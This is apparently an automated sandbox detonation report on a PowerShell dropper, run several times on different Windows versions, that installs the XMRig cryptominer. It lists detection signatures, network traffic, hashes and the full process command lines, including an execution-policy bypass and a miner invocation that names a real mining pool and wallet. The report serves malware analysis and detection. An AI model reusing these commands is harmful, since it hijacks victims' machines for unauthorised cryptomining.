| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2420 wrote to memory of 4720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2420 wrote to memory of 4720 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.73:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 73.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 23.62.61.73:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
memory/2420-0-0x00007FFE63123000-0x00007FFE63125000-memory.dmp
memory/2420-1-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/2420-7-0x0000018BA6160000-0x0000018BA6182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqqptchz.utz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2420-12-0x00007FFE63123000-0x00007FFE63125000-memory.dmp
memory/2420-13-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/2420-15-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/2420-16-0x0000018BA8780000-0x0000018BA8792000-memory.dmp
memory/2420-17-0x0000018BA8410000-0x0000018BA841A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4720-48-0x00000207582E0000-0x0000020758300000-memory.dmp
memory/4720-49-0x0000020758330000-0x0000020758350000-memory.dmp
memory/4720-50-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-53-0x0000020758350000-0x0000020758370000-memory.dmp
memory/4720-52-0x0000020758370000-0x0000020758390000-memory.dmp
memory/4720-51-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-54-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/2420-55-0x00007FFE63120000-0x00007FFE63BE1000-memory.dmp
memory/4720-56-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-58-0x0000020758350000-0x0000020758370000-memory.dmp
memory/4720-57-0x0000020758370000-0x0000020758390000-memory.dmp
memory/4720-59-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-60-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-61-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-62-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-63-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-64-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-65-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-66-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-67-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-68-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-69-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-70-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-71-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-72-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-73-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-74-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-75-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-76-0x00007FF736640000-0x00007FF737273000-memory.dmp
memory/4720-77-0x00007FF736640000-0x00007FF737273000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
296s
Max time network
307s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4852 wrote to memory of 3096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4852 wrote to memory of 3096 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/4852-0-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqzeluia.4k1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4852-10-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/4852-1-0x0000026484900000-0x0000026484922000-memory.dmp
memory/4852-11-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/4852-12-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/4852-15-0x000002649CD60000-0x000002649CD6A000-memory.dmp
memory/4852-14-0x000002649CD70000-0x000002649CD82000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3096-46-0x0000010EF45D0000-0x0000010EF45F0000-memory.dmp
memory/3096-47-0x00007FFE1DAA0000-0x00007FFE1DE14000-memory.dmp
memory/3096-48-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-49-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-50-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-51-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-52-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-53-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-54-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-55-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-56-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-57-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-58-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-59-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-60-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-61-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-62-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-63-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-64-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-65-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-66-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-67-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-68-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-69-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
memory/3096-70-0x00007FF7BA670000-0x00007FF7BB2A3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win7-20240508-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
Network
Files
memory/1452-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
memory/1452-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
memory/1452-5-0x000000001B810000-0x000000001BAF2000-memory.dmp
memory/1452-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1452-12-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
306s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2804 wrote to memory of 1564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2804 wrote to memory of 1564 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/2804-3-0x00007FF931353000-0x00007FF931354000-memory.dmp
memory/2804-5-0x0000019CF5950000-0x0000019CF5972000-memory.dmp
memory/2804-8-0x0000019CF5B00000-0x0000019CF5B76000-memory.dmp
memory/2804-9-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cxcvikk2.vk1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2804-22-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-25-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-29-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-30-0x00007FF931353000-0x00007FF931354000-memory.dmp
memory/2804-31-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-32-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2804-65-0x0000019CF5940000-0x0000019CF594A000-memory.dmp
memory/2804-52-0x0000019CF5AE0000-0x0000019CF5AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1564-94-0x0000016BFC710000-0x0000016BFC730000-memory.dmp
memory/1564-95-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-96-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-97-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-98-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-99-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-100-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-101-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-102-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-103-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-104-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-105-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-106-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-107-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-108-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-109-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-110-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-111-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-112-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-113-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-114-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-115-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-116-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
memory/1564-117-0x00007FF618B70000-0x00007FF6197A3000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
265s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4600 wrote to memory of 4088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4600 wrote to memory of 4088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
